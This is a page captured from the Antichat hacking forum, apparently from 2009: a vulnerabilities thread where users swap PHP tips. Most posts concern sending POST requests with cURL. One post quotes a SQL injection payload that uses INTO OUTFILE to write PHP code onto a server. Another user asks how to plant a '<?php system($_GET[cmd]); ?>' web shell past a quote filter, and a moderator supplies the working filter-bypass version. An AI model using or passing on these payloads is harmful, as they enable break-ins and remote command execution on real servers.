ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10041  
Старый 11.11.2009, 21:07
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

Цитата:
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?
Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?
 
Ответить с цитированием

  #10042  
Старый 11.11.2009, 21:30
Аватар для Aртем
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от vorona  
и там нету ничего, что мне нужно. те ф-ции я знаю.
есть скрипт 1.php с ПОСТ-формой. Есть скрипт 2.php , который принимает ПОСТ-запросы с первого. Как без участвия первого, передать ПОСТ-запрос второму?
как вариант
PHP код:
<?php
$ci 
curl_init(); // открываешь соединение
curl_setopt($ciCURLOPT_URL"http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
curl_setopt($ciCURLOPT_POSTtrue); // выбираешь пост запрос
curl_setopt($ciCURLOPT_POSTFIELDS"параметр1=значение&параметр2=значение"); // перечесляешь запросы
curl_exec($ci); // выполняешь запрос, и получешь ответ
curl_close($ci); // закрываешь соединение
?>
 
Ответить с цитированием

  #10043  
Старый 11.11.2009, 21:41
Аватар для Train
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

to Qwazar
Код:
SELECT id from news ORDER BY 1 LIMIT 1 INTO OUTFILE '/tmp/result11.txt' LINES TERMINATED BY '<?php phpinfo(); ?>'
Круто, не знал, не видел никогда. блин круто.

to vorona
А еще можно на JS с помощью AJAX обращаться к скрипту пост запросом
 
Ответить с цитированием

  #10044  
Старый 11.11.2009, 21:42
Аватар для vorona
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
Провел на форуме:
390301

Репутация: 3
По умолчанию

Цитата:
Сообщение от Ins3t  
Что мешает сделать свою "ПОСТ форму" и отправлять с не запрос на скрипт номер 2 ?
ничего. но в своей форме опять же нада нажимать на кнопку субмит. ничё не меняется по сути.
 
Ответить с цитированием

  #10045  
Старый 11.11.2009, 21:44
Аватар для vorona
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
Провел на форуме:
390301

Репутация: 3
По умолчанию

Цитата:
Сообщение от Aртем  
как вариант
PHP код:
<?php
$ci 
curl_init(); // открываешь соединение
curl_setopt($ciCURLOPT_URL"http://сайт_где_находится_скрипт/сам_скрипт.php"); // указывай ссылку на свой скрипт здесь
curl_setopt($ciCURLOPT_POSTtrue); // выбираешь пост запрос
curl_setopt($ciCURLOPT_POSTFIELDS"параметр1=значение&параметр2=значение"); // перечесляешь запросы
curl_exec($ci); // выполняешь запрос, и получешь ответ
curl_close($ci); // закрываешь соединение
?>
спс, попробую таким способом.
 
Ответить с цитированием

  #10046  
Старый 11.11.2009, 21:49
Аватар для vorona
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
Провел на форуме:
390301

Репутация: 3
По умолчанию

Fatal error: Unknown function: curl_init() in T:\home\virtual\site.ru\spam.php on line 2
 
Ответить с цитированием

  #10047  
Старый 11.11.2009, 21:52
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Синий фломастер пишет белым....


зы: Мне тоже такие бестолковые посты начинать писать???

Когда же гугл станет домашней страницей ворон...и других?
Цитата:
https://forum.antichat.ru/showthread.php?t=103580
http://forum.antichat.ru/showthread.php?t=55424
http://forum.dklab.ru/viewtopic.php?t=7155

Последний раз редактировалось $n@ke; 11.11.2009 в 21:55..
 
Ответить с цитированием

  #10048  
Старый 12.11.2009, 10:28
Аватар для Roston
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
Отправить сообщение для Roston с помощью ICQ
По умолчанию

просто поставь пакет с новым пхп, за одно и его обновиш. на php.net точно он есть
 
Ответить с цитированием

  #10049  
Старый 12.11.2009, 13:49
Аватар для sideup
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
 
Ответить с цитированием

  #10050  
Старый 12.11.2009, 13:50
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от sideup  
Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
PHP код:
<?php system($_GET[cmd]); ?>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ